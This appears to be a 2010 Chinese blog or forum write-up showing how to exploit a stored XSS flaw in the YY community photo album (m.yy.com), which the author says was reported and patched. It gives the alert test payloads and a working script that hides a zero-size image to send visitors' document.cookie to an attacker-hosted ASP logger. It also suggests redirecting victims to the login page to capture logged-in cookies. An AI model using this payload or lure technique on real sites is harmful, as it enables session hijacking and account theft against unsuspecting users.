利用YY社区XSS漏洞获取并转存用户cookie
时间:2010-12-31 来源:B0mbErM@n
前些日子已经给官方提交了漏洞,现在已经修补了,给大家参考下吧.正好还有图
-
介绍:
通过YY社区[m.yy.com]的相册功能来达到XSS的实现.
使得获取并转存访问者的有效cookie.在很多地方都可以用到这个方法来获取cookie.
-
验证XSS:
登录[m.yy.cm]后申请签约,申请后可拥有属于你自己的YY空间.
点开相册>上传照片>上传完毕后打开照片>编辑描述>插入XSS语句.
最基本的一个XSS语句><script>alert(/B0mbErM@n/)</script>
通过验证,弹出窗口并提示/B0mbErM@n/后,我们可以进行下一步验证.
-
深层验证XSS:
我们再编辑修改为<script>alert(document.cookie)</script>
这次弹窗则为cookie值,会显示username&password等信息.显示成功.
-
利用XSS转存cookie:
插入XSS语句<script>document.write('<img src="http://website/[email protected]?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
其中[email protected]为文件,website为网址.我们需要将asp文件放入一个可访问的网站中.当用户访问我们插入XSS页面时会执行asp程序并不弹出提示框,是隐藏进行的.
-
[email protected]的程序代码:
备注:会在记录msg=并保存在程序目录下的[email protected]中.
-
进一步扩展:
当然用户可能不会登录后再访问我们的XSS页面,为使其登录后再访问,我们可在[email protected]的最后加上一个自动跳转页面至登录页面,对方会下意识的登录后再次打开我们含有XSS语句的页面.这时我们就获得了访问者的cookie.(ASP的自动跳转代码很多,在这里就不一一举例,各位谷歌一下会有更多更好更详细的代码)
标签分类: